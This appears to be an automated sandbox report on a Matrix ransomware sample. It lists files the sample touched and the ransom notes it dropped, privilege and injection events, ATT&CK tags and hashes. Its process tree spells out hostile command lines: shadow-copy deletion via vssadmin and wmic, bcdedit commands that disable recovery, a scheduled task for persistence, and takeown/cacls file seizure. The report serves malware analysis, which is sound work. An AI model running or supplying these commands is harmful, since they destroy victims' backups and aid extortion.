Files\VideoLAN\VLC\plugins\codec\libtextst_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_chromaprint_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\bin\java_crw_demo.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\Solitaire\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\sunec.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Microsoft Games\Chess\ja-JP\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_stats_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\it.pak e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\prism-d3d.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libscte18_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\es-ES\Solitaire.exe.mui e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\visualization\libglspectrum_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libmpg123_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 2044 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exerhcykjvj64.exepid Process 1712 powershell.exe 276 rhcykjvj64.exe 276 rhcykjvj64.exe 276 rhcykjvj64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
rhcykjvj64.exepid Process 276 rhcykjvj64.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exerhcykjvj64.exevssvc.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 276 rhcykjvj64.exe Token: SeLoadDriverPrivilege 276 rhcykjvj64.exe Token: SeBackupPrivilege 288 vssvc.exe Token: SeRestorePrivilege 288 vssvc.exe Token: SeAuditPrivilege 288 vssvc.exe Token: SeIncreaseQuotaPrivilege 1352 WMIC.exe Token: SeSecurityPrivilege 1352 WMIC.exe Token: SeTakeOwnershipPrivilege 1352 WMIC.exe Token: SeLoadDriverPrivilege 1352 WMIC.exe Token: SeSystemProfilePrivilege 1352 WMIC.exe Token: SeSystemtimePrivilege 1352 WMIC.exe Token: SeProfSingleProcessPrivilege 1352 WMIC.exe Token: SeIncBasePriorityPrivilege 1352 WMIC.exe Token: SeCreatePagefilePrivilege 1352 WMIC.exe Token: SeBackupPrivilege 1352 WMIC.exe Token: SeRestorePrivilege 1352 WMIC.exe Token: SeShutdownPrivilege 1352 WMIC.exe Token: SeDebugPrivilege 1352 WMIC.exe Token: SeSystemEnvironmentPrivilege 1352 WMIC.exe Token: SeRemoteShutdownPrivilege 1352 WMIC.exe Token: SeUndockPrivilege 1352 WMIC.exe Token: SeManageVolumePrivilege 1352 WMIC.exe Token: 33 1352 WMIC.exe Token: 34 1352 WMIC.exe Token: 35 1352 WMIC.exe Token: SeIncreaseQuotaPrivilege 1352 WMIC.exe Token: SeSecurityPrivilege 1352 WMIC.exe Token: SeTakeOwnershipPrivilege 1352 WMIC.exe Token: SeLoadDriverPrivilege 1352 WMIC.exe Token: SeSystemProfilePrivilege 1352 WMIC.exe Token: SeSystemtimePrivilege 1352 WMIC.exe Token: SeProfSingleProcessPrivilege 1352 WMIC.exe Token: SeIncBasePriorityPrivilege 1352 WMIC.exe Token: SeCreatePagefilePrivilege 1352 WMIC.exe Token: SeBackupPrivilege 1352 WMIC.exe Token: SeRestorePrivilege 1352 WMIC.exe Token: SeShutdownPrivilege 1352 WMIC.exe Token: SeDebugPrivilege 1352 WMIC.exe Token: SeSystemEnvironmentPrivilege 1352 WMIC.exe Token: SeRemoteShutdownPrivilege 1352 WMIC.exe Token: SeUndockPrivilege 1352 WMIC.exe Token: SeManageVolumePrivilege 1352 WMIC.exe Token: 33 1352 WMIC.exe Token: 34 1352 WMIC.exe Token: 35 1352 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 1480 wrote to memory of 1664 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 28 PID 1480 wrote to memory of 1664 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 28 PID 1480 wrote to memory of 1664 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 28 PID 1480 wrote to memory of 1664 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 28 PID 1480 wrote to memory of 776 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 30 PID 1480 wrote to memory of 776 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 30 PID 1480 wrote to memory of 776 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 30 PID 1480 wrote to memory of 776 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 30 PID 1480 wrote to memory of 1768 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 32 PID 1480 wrote to memory of 1768 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 32 PID 1480 wrote to memory of 1768 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 32 PID 1480 wrote to memory of 1768 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 32 PID 1768 wrote to memory of 1712 1768 cmd.exe 34 PID 1768 wrote to memory of 1712 1768 cmd.exe 34 PID 1768 wrote to memory of 1712 1768 cmd.exe 34 PID 1768 wrote to memory of 1712 1768 cmd.exe 34 PID 1480 wrote to memory of 1936 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 35 PID 1480 wrote to memory of 1936 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 35 PID 1480 wrote to memory of 1936 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 35 PID 1480 wrote to memory of 1936 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 35 PID 1480 wrote to memory of 1716 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 36 PID 1480 wrote to memory of 1716 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 36 PID 1480 wrote to memory of 1716 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 36 PID 1480 wrote to memory of 1716 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 36 PID 1936 wrote to memory of 1612 1936 cmd.exe 39 PID 1936 wrote to memory of 1612 1936 cmd.exe 39 PID 1936 wrote to memory of 1612 1936 cmd.exe 39 PID 1936 wrote to memory of 1612 1936 cmd.exe 39 PID 1716 wrote to memory of 1560 1716 cmd.exe 40 PID 1716 wrote to memory of 1560 1716 cmd.exe 40 PID 1716 wrote to memory of 1560 1716 cmd.exe 40 PID 1716 wrote to memory of 1560 1716 cmd.exe 40 PID 1936 wrote to memory of 1316 1936 cmd.exe 41 PID 1936 wrote to memory of 1316 1936 cmd.exe 41 PID 1936 wrote to memory of 1316 1936 cmd.exe 41 PID 1936 wrote to memory of 1316 1936 cmd.exe 41 PID 1936 wrote to memory of 812 1936 cmd.exe 42 PID 1936 wrote to memory of 812 1936 cmd.exe 42 PID 1936 wrote to memory of 812 1936 cmd.exe 42 PID 1936 wrote to memory of 812 1936 cmd.exe 42 PID 1480 wrote to memory of 1244 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 43 PID 1480 wrote to memory of 1244 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 43 PID 1480 wrote to memory of 1244 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 43 PID 1480 wrote to memory of 1244 1480 e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe 43 PID 1244 wrote to memory of 428 1244 cmd.exe 45 PID 1244 wrote to memory of 428 1244 cmd.exe 45 PID 1244 wrote to memory of 428 1244 cmd.exe 45 PID 1244 wrote to memory of 428 1244 cmd.exe 45 PID 1244 wrote to memory of 2028 1244 cmd.exe 46 PID 1244 wrote to memory of 2028 1244 cmd.exe 46 PID 1244 wrote to memory of 2028 1244 cmd.exe 46 PID 1244 wrote to memory of 2028 1244 cmd.exe 46 PID 1244 wrote to memory of 2012 1244 cmd.exe 47 PID 1244 wrote to memory of 2012 1244 cmd.exe 47 PID 1244 wrote to memory of 2012 1244 cmd.exe 47 PID 1244 wrote to memory of 2012 1244 cmd.exe 47 PID 1244 wrote to memory of 1060 1244 cmd.exe 48 PID 1244 wrote to memory of 1060 1244 cmd.exe 48 PID 1244 wrote to memory of 1060 1244 cmd.exe 48 PID 1244 wrote to memory of 1060 1244 cmd.exe 48 PID 1060 wrote to memory of 1020 1060 cmd.exe 49 PID 1060 wrote to memory of 1020 1060 cmd.exe 49 PID 1060 wrote to memory of 1020 1060 cmd.exe 49 PID 1060 wrote to memory of 1020 1060 cmd.exe 49 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe"C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe" "C:\Users\Admin\AppData\Local\Temp\NWvty47c.exe"2⤵PID:1664
-
-
C:\Users\Admin\AppData\Local\Temp\NWvty47c.exe"C:\Users\Admin\AppData\Local\Temp\NWvty47c.exe" -n2⤵
- Executes dropped EXE
PID:776
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\OURmPM4v.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nDCJa1RD.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nDCJa1RD.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1612
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1316
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Matrix Ransomware
PID:812
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\9zVfwl02.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\9zVfwl02.vbs"3⤵PID:1560
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ZSGAFl8k.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:916
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ZSGAFl8k.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1712
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1620
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dkTIwLQn.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Views/modifies file attributes
PID:428
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:2028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c rhcykjvj.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Users\Admin\AppData\Local\Temp\rhcykjvj.exerhcykjvj.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\rhcykjvj64.exerhcykjvj.exe -accepteula "StandardBusiness.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:276
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {48B64E2B-BD01-4A1F-B0AB-085CCC9D320B} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]1⤵PID:1704
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ZSGAFl8k.bat"2⤵PID:1788
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2044
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1980
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1768
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1084
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:288
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
6fa2ff1dad01f838e0bb814affccd0c6
SHA18c26dfd9d19c3b45cd057f895f80d43326fc986d
SHA256e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c
SHA512de88757ee96943eaec582760b1631befb09ea8b9a5c8c757e24431978e3338ea7dd922e2b3dd1a47e514bb0ea93252171236f817c4d1220794e9472c8c2f24d3
-
MD5
6fa2ff1dad01f838e0bb814affccd0c6
SHA18c26dfd9d19c3b45cd057f895f80d43326fc986d
SHA256e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c
SHA512de88757ee96943eaec582760b1631befb09ea8b9a5c8c757e24431978e3338ea7dd922e2b3dd1a47e514bb0ea93252171236f817c4d1220794e9472c8c2f24d3
-
MD5
8eb51985066cb0782077f624013d47a2
SHA10549d07d51454e73b937946ba1887cacfce71835
SHA2565537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44
SHA512539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5
-
MD5
c18d18344bf4d5c4e1ecd1d07c0dd046
SHA125a374ae037c96b4426817e157b94153a43d4013
SHA256537ff3a18f4737e1ec85b49039f3fb03c3a52e7e5339c476f70f4aacdab8570c
SHA5120c8a077b0b008787be8135c810b306a0c91c10d8d7e721c86f8b3141b3ea4eced5a8db636bc8dd77d98962413bbd401ac9d04126129aa7dad3c7f7b70cd2c44a
-
MD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
MD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
MD5
3026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
MD5
b71d1a42691eafa4c5623ed00c131ef1
SHA1aea975684966eadf046203651dad8ac08a7631a7
SHA256caa8519aafd9bd5f6fccc17e5f9c63a38d0f9bd605d5149213d978776c32da3b
SHA512e7fb9d88710e92d1318885b11b17cec44fbe4f64b89341550dbe693707f6d110b54c55f815e58c26f6736a617bffc143bb6026da24062fe306e0935911c2ee5b
-
MD5
f47421a77de5e18ba71a0e8c03a3279b
SHA13d23d9984432068a3dcc023e2aab016672481692
SHA256fd7c6efdee52efb808d59d991866a30117c3f91228593937bc6e532569454d3c
SHA512c5a2c39a631a7e7e2fabbd79b904c4daf8190f59f185cbb76bc67ed0db524aee2bef453e90d1bebef539e827d4e556ceb7e1d92fb2e1f52c8136ce7dc67e4cac
-
MD5
6fa2ff1dad01f838e0bb814affccd0c6
SHA18c26dfd9d19c3b45cd057f895f80d43326fc986d
SHA256e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c
SHA512de88757ee96943eaec582760b1631befb09ea8b9a5c8c757e24431978e3338ea7dd922e2b3dd1a47e514bb0ea93252171236f817c4d1220794e9472c8c2f24d3
-
MD5
6fa2ff1dad01f838e0bb814affccd0c6
SHA18c26dfd9d19c3b45cd057f895f80d43326fc986d
SHA256e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c
SHA512de88757ee96943eaec582760b1631befb09ea8b9a5c8c757e24431978e3338ea7dd922e2b3dd1a47e514bb0ea93252171236f817c4d1220794e9472c8c2f24d3
-
MD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
MD5
3026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6